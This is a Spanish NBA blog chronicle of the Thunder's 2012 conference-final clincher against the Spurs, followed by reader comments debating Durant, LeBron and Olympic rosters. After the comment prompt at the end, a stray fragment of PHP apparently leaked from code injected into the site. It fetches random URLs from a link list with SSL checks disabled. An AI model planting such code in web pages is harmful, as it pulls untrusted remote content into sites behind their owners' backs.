La Crónica: Con Durant hasta el fin del mundo

07 de June de 2012 por txusma

Hace 4 años, los Thunder iniciaban su andadura en la liga con 12 derrotas en 13 partidos. PJ Carlesimo fue despedido y su lugar lo ocupó su 2º de abordo, un semi-desconocido Scott Brooks. Aquel año, los Thunder habían escogido con el número 4 del draft a Russell Westbrook que se unía de esta manera a Kevin Durant y Jeff Green, formando un prometedor pero sumamente inexperimentado núcleo. En el puesto 24 se hicieron con un tal Serge Ibaka y al año siguiente llegó James Harden. En 2009 también llegó al equipo Thabo Sefolosha a cambio de una primera ronda del draft. Finalmente, a mediados de la temporada pasada, Jeff Green fue traspasado a los Celtics a cambio de Kendrick Perkins y a mediados de esta el que llegaba era Derek Fisher, despedido por los Los Angeles Lakers.

Todos conocemos la historia pero aún así no puede dejar de parecernos un milagro. Un equipo que estaba hundido en la mayor de las miserias deportivas hace 4 años se acaba de clasificar para la final de la NBA. El espejo en el que se miran Wizards, Bobcats y tantos otros equipos. De todas maneras, todos saben que hay un ingrediente fundamental en esta exitosa receta: Kevin Durant es a los Thunder lo que el arroz a la paella.

Cerca de 20000 personas vestidas de blanco abarrotaban las gradas del Chesapeake Energy Arena. Sabían que estaban ante la oportunidad de sus vidas y no tenían previsto dejarla escapar a pesar de que enfrente estaba uno de los equipos más competitivos de los últimos años. Los Spurs empezaron con un tiro de la mano de un Tony Parker histórico. Participó en las 12 primeras canastas de su equipo y acabó el primer cuarto con 17 puntos y 5 asistencias. Durante el segundo cuarto, la ventaja de los Spurs llegó a los 18 puntos de la mano de un Parker desatado (21 puntos y 10 asistencias a la media parte) y un gran acierto desde la línea de 3 puntos, con protagonismo especial para Stephen Jackson que anotó los 4 triples que intentó. Todo marchaba según el guión previsto por Popovich. Al final resultaría que no iba a ser tan difícil como se pensaba y que a los “niños” les pesaría la presión.

Pero tras el descanso llegó el huracán Kevin Durant. De su mano, los locales remontaron el partido, enardecieron las gradas, se aceleraron corazones y rugieron gargantas. Tim Duncan y Stephen Jackson (2 triples más al saco) capeaban el temporal como podían y conseguían llegar al final del tercer cuarto 2 arriba. En cualquier otra circunstancia me hubiera apostado todo mi dinero por San Antonio, un equipo curtido en 1000 batallas, con jugadores que han superado situaciones similares decenas de veces, pero ayer el partido no se les podía escapar a los Thunder. Con Durant y Westbrook hipervigilados fue el turno de 2 jugadores separados por 15 años de diferencia pero que tienen en el último cuarto su hábitat preferido. James Harden y Derek Fisher anotaron 2 triples claves que prácticamente finiquitaban las opciones de los Spurs. Stephen Jackson falló, posteriormente, el único de los 7 triples que intentó durante el partido y los Spurs hincaron finalmente la rodilla. Habían sido superados por un grupo de jóvenes, fuertes, atléticos y hambrientos jugadores que han sido mejores en el global de la eliminatoria. ¡El rey ha muerto, larga vida al rey!

PREMIOS

MVP: A pesar de la exhibición (otra más) de Kevin Durant hoy es día para premiar a toda la franquicia de los Thunder desde el mismo Durant hasta el último de los entrenadores auxiliares de Scott Brooks. Mención especial para el entrenador de Oklahoma al que pocos veíamos capaces de hacer frente al viejo Greg Popovich.

Sorpresa: Derek Fisher vuelve a otra final de la NBA y tiene la oportunidad de superar a Kobe Bryant. Lejos de ser un anillo regalado, su aportación en este sexto partido volvió a ser fundamental. Un hombre de instantes.

Decepción: 20 victorias consecutivas les llevaron a la historia y 4 derrotas consecutivas les han sepultado. El sube-baja de los Spurs ha sido como el de las acciones de Facebook.

Esfuerzo en vano: Tony Parker cuajó una primera parte que pasará a la posteridad pero se quedó sin fuelle en la 2ª parte. Stephen Jackson anotó 23 puntos con un 6 de 7 en triples y Tim Duncan acabó el partido con 25 puntos y 14 rebotes.

Imágenes | AP Photos / Getty Images

Comenta

31 comentarios a esta entrada

  1. nba dice:
    #1

    Indenpendientemente de cual sea el desenlace final , el resto de GM’s deben estar flipando porque todas las carambolas que se tienen que dar para que todo les haya salido de cara a estos Thunder se han dado, a diferencia de Portland que todo o casi todo les sale mal .
    Lo que si parece es que los niños , ya se han hecho hombres, Lebron … parece que lo vas a tener muy crudo en proximos años , dependerá en gran medida de como se muevan en los despachos los Thunder para mantener el grupo y evitar que a WestBrook se le vaya la pinza .
    Enhorabuena a los Thunder por que a lo tonto se han cargado a Dallas, Lakers, Spurs , los ultimos campeones de la conferencia Oeste en los ultima decada

      Citar

  2. GreenPride dice:
    #2

    Y el futuro se convirtió en presente… aunque durante muchos minutos no lo pareció.
    En cierto modo este 6º partido ha sido un resumen de la serie por el modo en el que se desarrolló. De primeras los Spurs parecían ser de nuevo ese equipo inspirado, imposible de contener en ataque y con las cosas claras que arrasaba en los PO y en esta serie durante los 2 primeros partidos bailando a los Thunder.
    Con Duncan en la mejor forma de esta serie haciendo daño por primera vez, Parker volviendo a ser la pesadilla de los 2 primeros partidos y los tiradores metiéndolas de todos los colores con un increíble Stephen Jackson (6/6 triples) para abrir hasta 18 puntos de ventaja. Enfrente los Thunder capeaban el temporal como podían, más o menos efectivos en ataque pero superados atrás por el ataque de San Antonio que se retiraba 15 arriba al descanso tras otro buzzer-beater increíble de Durantula.
    Sin embargo todo cambió con el paso por los vestuarios como cambió entre el 2º y el tercer partido. De repente los Thunder empezaron a defender con éxito a Parker y su paso por los bloqueos, Manudo no pudo aparecer y sólo Duncan y Jackson iban sumando muy poco a poco. Mientras en el otro lado se desataba el trueno. Durant y Westbrook volaban y en 8 minutos la diferencia ya se había quedado en 2 puntos y la sensación de que los Spurs se les venía poco a poco el mundo y los años de su plantilla encima. De ahí al final un quiero y no puedo mantener el ritmo de anotación y defensa por parte de los Spurs y unos Thunder que poco a poco se hicieron con el partido de manos de un increíble Durant. Del colapso ofensivo Spur da buena cuenta ver que anotaron 63 puntos en la primera parte y 36 en la segunda.
    Por los Spurs fenomenal primera parte de Parker para casi desaparecer en la segunda y partidazo con mayúsculas de Duncan que dió la cara en todo momento (25-14 para él) y gran aportación de Stephen Jackson.
    En los Thunder los sospechosos habituales con actuación de nuevo decisiva de Durant (34 puntos, 14 rebotes, 5 asistencias y 2 tapones) bien acompañado esta vez por Westbrook que tras varias entradas erráticas en los 2 primeros cuartos se dedicó más a lanzar de media distancia para acabar con 25 e inteligente Harden matando desde el triple acompañados esta vez por la inestimable ayuda de Fisher metiendo los tiros abiertos. Su experiencia está haciendo mucho bien al equipo. De nuevo clave la alineación con Durant de 4 ya que su rapidez le ha permitido cubrir mucho mejor a los Spurs.
    Fenomenales series las que hemos vivido, con un vuelco histórico y un cambio de guardia que da la bienvenida al futuro de un equipo que puede dominar la NBA los próximos años si consigue mantener su columna. Estos Thunder han madurado a pasos avanzados en estos PO y en estas series y ya son los máximos candidatos al anillo. Desde mi punto de vista estarán locos si permiten irse a Ibaka o Harden en vez de largar a Perkins por ejemplo si es tema de dinero. Pero eso será otra historia. Decir que para mí estos PO ponen a Durant por delante de LeBron en cuanto a MVP de la NBA, con influencia mucho mayor en los resultados finales y decidiendo un montón de partidos en el clutch. Ahora les queda la final donde creo que serán favoritos jueguen contra quien jueguen. Podría ser un momento decisivo en esa comparación Durant-LeBron pero yo por mi parte, ojalá sea contra Boston y podamos ver otro duelo equipo vieja escuela-equipo nueva escuela.

      Citar

  3. Uno cualquiera dice:
    #3

    Venía a decir lo mismo que nba:

    Los Thunder han eliminado en estos PO a los últimos 13 campeones de la conferencia Oeste.

    Y en caso de que en la final se enfrentaran (y ganaran) a los Celtics, habrían eliminado en su camino al anillo a los últimos 5 campeones de la NBA. Aunque esto ya son elucubraciones.

      Citar

  4. Pcerezo dice:
    #4

    No se me ocurre a los Celtics pudiendo frenar este torbellino de juventud. Son un gran equipo.
    En cuanto a los Heat si llegan van a necesitar 75-80 puntos de Wade y Lebron para frenar esto.
    Durant es muy bueno, pero yo estoy prendado de Harden, que jugador. Como ha evolucionado este año. Por fin el talento no está bajo sospecha…

      Citar

  5. Pcerezo dice:
    #5

    Durant. 34-14. Vaya numeritos para un 6º partido de final de conferencia contra los Spurs. Y sin esconderse y en los momentos clave. Siempre aparece. Es la estrella, la estrella decide para bien o para mal. El gana, él pierde.
    Este tío si no hay nada que lo trunque va a ser top 5 de la historia. Por los número que va a hacer y por los anillos que va a ganar, estoy convencido que los va a ganar, se va a convertir en top 5, y veremos.

      Citar

  6. GreenPride dice:
    #6

    Por cierto, colapso de la segunda unidad de los Spurs en estas series. Todos señalábamos como una gran ventaja de San Antonio que sus secundarios contribuían todos en gran medida pero cuando se han puesto las cosas feas de verdad ni Green, ni Bonner, ni Splitter, ni Blair, ni Diaw, sólo algo de Gary Neal y los que sí han estado bien han sido Leonard y sobre todo Stephen Jackson. ¿Cambios en los Spurs? Todo dependerá de lo que decida hacer Duncan…

      Citar

  7. Jose Luis dice:
    #7

    Los Spurs como el año pasado. Los secundarios valen para la regular, pero en play-offs la rotación tiene que ser de 8-9 contrastados, o 10 si los tienes, y esos jugadores no lo son. Han llegado a la final de conferencia porque no se han enfrentado a nadie en el camino. Los Clippers solo te pueden ganar si llegan cerca en los últimos cuartos, pero si no es imposible. En la primera serie dura se han ido fuera, y si hubieran llegado los Lakers hubiera sido igual.

      Citar

  8. futurman dice:
    #8

    Yo creo que Durant es más determinante que Lebron por que tira muchísimo mejor. No he visto un tío tirando tan bien de tres en mi vida, es que si le ves cargando el brazo a falta de 30-40 segundos para el final sabes que te la enchufa….

      Citar

  9. Vader dice:
    #9

    Es que ademas de ser muy alto, unos 2,06-2,08, tiene los brazos muy largos y tirando en suspension es indefendible… Ni siquiera necesita tirarse hacía atras como hacía Jordan y ahora Kobe. Y claro, encima tiene una buena mecanica y talento para meterlos.

      Citar

  10. Alfredo dice:
    #10

    Creo que en OKC ven el anillo cerca y con razones de peso. Deberia ser la final contra Boston. Si pierde Miami esta noche, pondran como excusa la lesion de Bosh o lo llamaran por su nombre, FRACASO???
    Y la pregunta del millon, donde esta Sancho88??? Echamos de menos tus comentarios!!!!

      Citar

  11. Ru dice:
    #11

    Como dice nba en el primer comentario,que pequeño es el filo que separa una buena de una mala decisión,un Oden de un Durant,un Sam Bowie de un Jordan…pobre Olshey.Han sido 4 años de trayectoria que puede que rematen con un anillo,yo sinceramente los veo favoritos tanto si hoy clasifica Boston como si Miami llega a la final.4 años para convertir un proyecto en algo muy grande.No veo rival para Thunder a corto plazo.

    Los Spurs lo han intentando,con una circulación de balón de nuevo excelente en la primera mitad pero en la segunda parte irrumpieron como un “rayo” los Thunder,olieron sangre y a por ellos,con la notable ayuda de su gente en un ambiente que ya quisera para sí el fútbol.Ójala un día pueda decir que yo estuve en un pabellón de la NBA y vivi esa atmósfera,debe ser la hostia.

    Los Spurs,algún día tiene que acabarse ese equipo,un día la leyenda de Tim “Siglo XXI” Duncan será eso,una leyenda y no un jugador en activo.A día de hoy mi sensación es de tristeza si Duncan decide retirarse,quería verlo en los más alto una última vez.Veremos que noticias llegan desde allí.

      Citar

  12. melo15 dice:
    #12

    Pues en mi opinion seria mas atractiva una final Miami-Boston, creo que sera mas igualada y que los Heat tendran bastantes opciones de ganar. En primer lugar Lebron me parece mejor jugador que Durant, muchisimo mas completo: defiende, rebotea y asiste mejor que Durant y en lo unico que es peor es en anotacion. Para mi este 6 partido entre Boston y Miami va a marcar la carrera de Lebron, este proyecto se diseño para ganar anillos, el año pasado tenien excusa pero esta no, y menos si caen en semifinales.

      Citar

  13. simon dice:
    #13

    PUff no se melo15, Durant es mejor rebotero y lo de asistencias tampoco tanto puesto que Durant asiste menos pero tambien amasa menos balon que Lebron. y si nos ponemos a mirar rendimientos en el Clutch…
    es que si mantienen el bloque no veo a nadie a corto plazo tosiendoles, Durant me parece mejor que Lebron
    y Harden con Wade actualmente es una X y luego a Heat le queda poco mas mientras que a Thunder aun le quedan Ibaka, Westbrook, Sefolosha… e incluso Perkins que en Heat quitando a Bosh sería el mejor interno.

      Citar

  14. Nacho dice:
    #14

    Acabo de ver el partido. Y entre la sensación de medio mosqueo y de admiración absoluta por estos Thunder, me quedo con las sensaciones que he tenido al final del 2º cuarto. Cuando se levantaba Durant me he dicho, si la mete gana OKC. Tiene este chico algo de genio, aparte de estar casi siempre, está cuando debe estar.
    Sobre el debate entre él y LeBron sobre quien es mejor jugador… supongo que los gustos cuentan, pero lo que comenta Simon es cierto. Durant amasa menos bola, y eso hace que de menos asistencias, y también al ser más discreto jugando parece que se le valora menos que, de momento, al mayor fracaso de la historia de la NBA. Y que siga siendo así.

      Citar

  15. melo15 dice:
    #15

    Bueno, lo de que daria mas asistencias es relativo, alomejor no la amasa porque no sabe hacerlo.
    Pero Lebron es mas completa, eso es un hecho, aunque el mejor momento para debatir sobre esta comparacion seria en unas finales.
    PD: Wade igual que Harden??? No me hagas reir, wade le supera en todo menos en tiro exterior y ademas a diferecia de Harden, Wade es un primera o segunda espada en canvio Harden es tercera, pero en todo caso Wade es mejor pasador, defensor…

      Citar

  16. Txusma dice:
    #16

    Nacho: Durant amasa menos bola, y eso hace que de menos asistencias, y también al ser más discreto jugando parece que se le valora menos que, de momento, al mayor fracaso de la historia de la NBA. Y que siga siendo así.

    El mayor fracaso de la historia de la NBA es Lebron o el proyecto Heat? Si te refieres a Lebron me parece una pasada el comentario.

      Citar

  17. Nacho dice:
    #17

    Txusma: El mayor fracaso de la historia de la NBA es Lebron o el proyecto Heat? Si te refieres a Lebron me parece una pasada el comentario.

    Hombre, van los dos. Me refería a LeBron, aunque puede que algo confundido por el equipo en el que milita. Pero ya dije en otro post aquí, que el fracaso se debe medir en base a las expectativas. No dudo que como jugador LeBron es impresionante, de los que hay pocos. Pero si analizamos su condición de deportista, con todo lo que conlleva, a mí, de momento, me parece un fracaso. Esta noche la liará en el Garden, y me callará la boca ganando el anillo. Pero hasta entonces… por eso he dicho de momento.
    Lo explico un poco:
    El deportista busca competir, disfrutar y ganar como fin último. Se puede ser un gran deportista, un gran competidor sin haber ganado. Mítico el caso de Poulidor en el ciclismo (aunque creo que al final ganó). Pero el deportista debe medir todos sus actos. Y los del autoproclamado Rey deja mucho que desear. Si hubiese arrasado, ganado, me caería mal, pero no tendría nada que objetar, sería un bocazas, pero un campeón (Mourinho, sin ir más lejos) Pero ‘The Chosen One’ aún no ha ganado nada. (Obvio los JJOO aquí) Y ha predicado mucho, fuera y dentro de la cancha. Y sus expectativas son las de muchos anillos, y aún sus manos están vacías. La culpa era de lo mal rodeado que estaba en los Cavs, por eso anunció lo que anunció, y cómo lo anunció. De moemnto, para mí, fracaso. Y ojo, que no quiere decir que no sea un jugador excepcional.

      Citar

  18. Sancho88 dice:
    #18

    Jejeje, aquí estoy!! Bueno, para los que os gustan mis comentarios, que sepaís que esta tarde fabriqué mi primer artículo digno de ser publicado en una hipotética sección de las que quedaron en el aire: El Rincón de Sancho, pero realmente, en realidad me sabe mal ser el loco de la página, jajaja, porque el resto hablais de la NBA con bastante seriedad (exlcuyo a Magic porque es un cachondo mental y quizá grandes dosis de su inspiración con sus artículos genialísimos “reflexiones sobre la bocina” me han llegado para darme un poco de aire a mi inspiración: en resumidas cuentas, es como mi musa artística, jajajajajaj (joe, que gay ha quedado eso, jaajj)). No en serio, a veces pienso que quizá haya gente que no le guste nada que me tome la NBA un poco a cachondeo y que le ofendan mis comentarios y artículos. Lo pienso todos los días, pero realmente acabo sucumbiendo porque es un sitio en el cual me siento super cómodo, derrocha calidad por todos los poros, y he de decir, que cada día os curráis más los artículos, con un estilo más depurado, una estructura más clara y la profesionalidad que os da el respeto por la NBA. No sé, yo si me dejan los jefes mando el artículo y que sea lo que dios quiera. El resumen de la serie está en el horno también, quizá no estoy entrando ahora mucho a la página por varias razones: tengo que currar madrugando mucho y no me puedo quedar a ver los partidos en directo como me gustaría, sino que tengo que vérmelos en rojadirecta descargados; además, he cogido la puñetera manía de ser el anti-spoiler ‘nomedigascomohaquedadoqueterreviento’, y hasta que no me veo el partido no entro a ninguna página de información general por si acaso, y eso, que me acabo de ver los partidos del día anterior a la hora en la que empieza el partido del día de hoy, me he quedado sin ver el quinto de Boston, hoy no me ha dado tiempo a ver el sexto de los Thunder…. un desastre. Mañana prometo acabar los deberes y entregar mi artículo de resumen como corresponde. A ese artículo sumaré el de la columna de Sancho si me dais el parabien (os arrepentireis), 😀

      Citar

  19. rumbero dice:
    #19

    Lebron será más completo, pero si quiero un anillo me voy a la guerra con Durant sin pensármelo. Es que en esta serie el chaval ha liquidado a estos Spurs que venian arrasando metiéndolas de todos los colores y cuando hacía falta. Tiene aura de auténtico crack y lo está demostrando. Para mi va a marcar una época, y en estas finales puede empezar a demostrarlo.
    A James le toca en un par de horas y en el Garden. A ver como le va. Yo aqui soy poco imparcial, espero que Garnett le devuelva la sonrisita

      Citar

  20. GreenPride dice:
    #20

    Vaya partido de LeBron!!! Si hasta ahora había hecho unas fenomenales series pero fallado en el clutch esta vez no dio lugar a ello. 45 puntos (19/26 tiros) 15 reb 5 asist. Él sólo ha ganado el partido. Lástima para los aficionados célticos como yo. Actuación para la historia y ahora todo apunta a un LeBron-Durant en las finales… más luego en su post

      Citar

  21. simon dice:
    #21

    Histórico partido de Lebron, pero nada que pueda callar las bocas de las criticas que le haciamos el otro dia, efectivamente el solo ha apalizado a Boston pero el problema de Lebron no es ni siquiera los partidos importantes ( al menos este año ) sino mas bien los minutos finales apretados en los que suele desaparecer, domina todos los partidos hasta falta de 5 o 6 minutos en donde, cuando van igualados desaparece. Ese es el gran problema de Lebron y la gran tara que le va a costar mucho quitarse, pq aqui la fama es todo. Por ejemplo Bryant tiene fama de gran jugador en el clutch ( lo és ) pero si pierde 3 partidos seguidos fallando en Clutch pues nadie va a decir de repente que es un mal clutch pero si lebron gana 2 partidos seguids en el clutch y al tercero falla las criticas de que es un mal clutch player van a volver enseguida creo que solo una bomba en el 7 de la final para ganar el anillo podría quitarle esa mala fama jejejej
    Ayer me ponía palote pensando en unas hipoteticas finales Thunder- Boston: Pensaba bonito lugar Boston para que Durant gane su primer anillo, y la verdad hoy volviendo a pensar creo que me pondría mas palote un enfrentamiento Lebron- Durant en las finales.

      Citar

  22. nach dice:
    #22

    melo15:
    Pero Lebron es mas completa, eso es un hecho, aunque el mejor momento para debatir sobre esta comparacion seria en unas finales.

    LeBron es más completo, es cierto, es probablemente el jugador más completo de la NBA actual: puede jugar de 2,3 o 4 manteniendo un buen rendimiento en todas esas posiciones, incluso podría jugar de 1 (muchas veces ya hace de 1 virtual subiendo el balón), físicamente es el mejor actualmente en su posición, es explosivo, ha mejorado mucho el tiro exterior, lee muy bien las líneas de pase en defensa…
    Pero Durant tiene algo, llámalo como quieras, que lo hace diferente a los demás, aparte de ser virtualmente indefendible por nadie en toda la NBA (ni siquiera LeBron), tiene demasiada envergadura para que lo defienda un 3 y es demasiado rápido para que lo defienda un 4.

      Citar

  23. melo15 dice:
    #23

    Bueno ya veremos si Lebron no puede defenderlo, no digo que lo vaya a secar pero Lebron ya se ha enfrentado a dos de los mejores alero anotadores de la liga y los ha defendido muy bien. Os puede caer mal Danny Granger, pero es un buen anotador, al igual que Melo que es un Top-5 en anotacion y los ha secado asi que no veo razones para que Lebron no defiende con exito a durant.

      Citar

  24. nach dice:
    #24

    melo15:
    Bueno ya veremos si Lebron no puede defenderlo, no digo que lo vaya a secar pero Lebron ya se ha enfrentado a dos de los mejores alero anotadores de la liga y los ha defendido muy bien. Os puede caer mal Danny Granger, pero es un buen anotador, al igual que Melo que es un Top-5 en anotacion y los ha secado asi que no veo razones para que Lebron no defiende con exito a durant.

    Ninguno de ellos tiene ni la velocidad de Durant ni la envergadura, es muy complicado que un rival llegue a puntearle un tiro. Y para mí aún pasando Heat a la final (hay que jugar el 7º partido ojo, y son los Celtics), si Boston les está cortando penetraciones e intimidando con Garnett+Bass, no quiero ver lo que puede salir de Ibaka+Perkins xD

    Y OKC son un equipo mucho más rápido que los Celtics, no está de más recordarlo, le pueden plantar cara perfectamente a Heat en un partido a correr, es más, es imaginarme a Chalmers corriendo con la lengua fuera detrás de Westbrook y me entra la risa

      Citar

  25. simon dice:
    #25

    Es que aunque Lebron sea mas completo, Durant tiene esa mistica que lo hace ser el mejor. Y Anthony y Granger son grandes anotadores sobre todo Anthony pero ni aun asi le llegan a la suela del zapato a Durant ( aparte de las razones que ha dicho Nach, Yo creo que Lebron puede estorbar a Durant bastante pero creo que Durant puede molestarle todavia mucho mas a James que James a Durant, pero OJO!! no enterremos a Boston que aunque tienen todas las de perder en el 7º si hay un equipo en la NBA al que no puedes descartar es a Boston, que es el equipo con mas corazón de todos y a base de garra puede ganar donde sea, yo ya cometí el error de menospreciarlos a principios de temporada y mira…
    volviendo a Durant es que joder ya lo dijo alguien ayer viendolo jugar con 23 años si no median las lesiones es que va a acabar siendo recordado como uno de los 10 mejores jugadores de la historia y posiblemente el mejor en su posición… Estamos hablando de que Jordan juega su primera final con 28 años y este con 23 va a jugar la primera el angelito, a anillos se puede hinchar y a titulos de maximo anotador, y ya podría perfectamente tener un MVP en su casita. Durant es pura magia.

      Citar

  26. nba dice:
    #26

    Dios estoy temblando, me imagino un partido en las Olimpiadas España-EEUU, sale de titular Lebron, digamos que se empareja con Claver …, buff menudo destrozo que nos puede hacer , ya que Rudy deberia salir de 2, ya que Navarro parece que no esta bien fisicamente, pues digamos que Mike saca de suplente a Durant, y nosootros sacamos a nuestro suplente San Emeterio, dios menudo roto nos van a hacer en el puesto de 3, y en el resto ni te cuento .
    Bueno quizas poniendo a Ibaka de 3 habría alguna opcion de parar el monstruoso juego de perimetro que tienen los americanos.

      Citar

  27. GreenPride dice:
    #27

    Por partes que veo que la cosa está caliente.
    1) Los Heat todavía no han llegado a las Finales. Sí, tienen todas las papeletas después del partido de esta noche, pero no enterremos a los Celtics que luego van y la lían.
    2) Totalmente de acuerdo con simon en cuanto a Lebron y el clutch. Esta haciendo unas series magníficas, impresionantes contra Boston pero cuando ha tenido que jugarse los tiros decisivos de los partidos igualados la ha cagado. Falló el tiro para ganar el 2º, no lanzo el tiro para ganar el 4º dándole un pase horrible a Haslem (podía ser buena la decisión pero mala la ejecución), se escondió en los minutos finales del 5º dejándole la bola a Wade. Es decir, en los 3 partidos igualados no ha marcado la diferencia en el clutch y aún está por venir el partido igualado que defina LeBron con sus jugadas en estos PO. Es el mejor del minuto 1 al 40 y pico pero si se llega igualado al final…. miedito.
    3) Justamente el punto 2) creo que es la diferencia con Durant que se ha mostrado intratable en los momentos calientes de los partidos igualados metiendo varias canastas totalmente decisivas en las series contra Dallas, Lakers y Spurs. Eso es lo que ahora mismo le hace especial frente a LeBron, a parte de que tiene un aire más humilde que le hace caer mejor al personal y un estilo de jugar más estilo “fino estilista” que el de LeBron que a veces es más “bestia parda” (aunque en esto se podría discutir mucho). Si al final hay final Heat vs Thunder ya veremos que pasa.

      Citar

  28. GreenPride dice:
    #28

    nba, ciertamente para los juegos EEUU tiene mucha ventaja sobre nosotros en la posición de 3 pero ahora te digo yo ¿Con quién van a parar ellos a nuestro juego interior Pau-Marc-Ibaka? Si Howard no va (que parece que no) creo que en ese punto hay tanta diferencia a nuestro favor como en el de 3 a favor suyo. Que nadie me malinterprete, USA es favorita pero yo creo que llegado el momento podríamos volver a tener nuestras opciones como en Pekín ya que hay cosas en las que somos mejores que ellos

      Citar

  29. nach dice:
    #29

    GreenPride:
    nba, ciertamente para los juegos EEUU tiene mucha ventaja sobre nosotros en la posición de 3 pero ahora te digo yo ¿Con quién van a parar ellos a nuestro juego interior Pau-Marc-Ibaka? Si Howard no va (que parece que no) creo que en ese punto hay tanta diferencia a nuestro favor como en el de 3 a favor suyo. Que nadie me malinterprete, USA es favorita pero yo creo que llegado el momento podríamos volver a tener nuestras opciones como en Pekín ya que hay cosas en las que somos mejores que ellos

    En primer lugar, no voy a ser yo quien entierre a los celtics (y como aficionado verde menos todavía), hay que jugar el 7º y va a haber que ganarlo, ninguno de los 2 equipos va a regalar nada.

    El tema del juego interior dependerá mucho de los árbitros, de hasta que punto permitan a los españoles defender las penetraciones de los LeBron, Wade y compañía y hasta que punto serán generosos a la hora de luchar por el rebote en campo contrario. Por dentro, tanto en cm como en calidad España es superiro a USA, muy superior diría yo, y con 3 jugadores de características totalmente diferentes unos de otros.

      Citar

  30. Nacho dice:
    #30

    Partidazo de LeBron, pero me sigo reafirmando en lo que dije ayer. Ha empezado a callarme la boca. La leche que me ha dado (esperada) ha sido impresionante. Pero tiene que dármela del todo. Cuando lo haga no volveré con el tema.
    En cuanto al partido de ayer, cierto que lo gana solo LeBron. Pero también lo pierde Pierce. Y algunas jugadas de enganche que falla incomprensiblemente Boston. Ya dije hace tiempo en mitad de la regular que Miami es brutal si decide el partido antes de los 6 últimos minutos. Son genios en ganar por aplastamiento. Pero deben ganar en finales apretados. No quiero ni imaginar si a Pierce le entran los triples y alguna otra canasta poniéndose a menos de 10 a falta de 9 minutos. Igual LeBron me da más fuerte. Pero lo dudo. De momento lo dudo.

    Sobre el debate de los JJOO, mi duda es el estado de Navarro. Con él en buenas condiciones tendríamos alguna opción, si está chungo, más chungo lo llevamos nosotros. Y ojito a Francia, que si bien a EEUU no puede hacerle sombra, a nosotros nos puede hacer un traje. De Argentina estoy un poco desconectado, pero creo que le falta juego interior. Que nos lo comente Esteban.

      Citar

  31. melo15 dice:
    #31

    El juego interior de USA no es peor que el de USA, me atreveria a decir que es incluso mejor.
    En la posicon de 4 nos superan, porque tienen al mejor ala-pivot del mundo: Kevin Love y ademas tambien cuentan con Griffin, Bosh, Aldridge. En la posicion de pivot tiene a Chandler, que en ataque es un zero a la izquierda pero en defensa es superior a Ibaka y Marc juntos. Y en la posiciones exteriores no hay comparacion.

    PD: me he olvidado que tambien pueden salir con durant de y entonces no hay solucion posible ya que pondrian a Love o a Aldridge de 5 que pueden hacerlo perfectamente.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>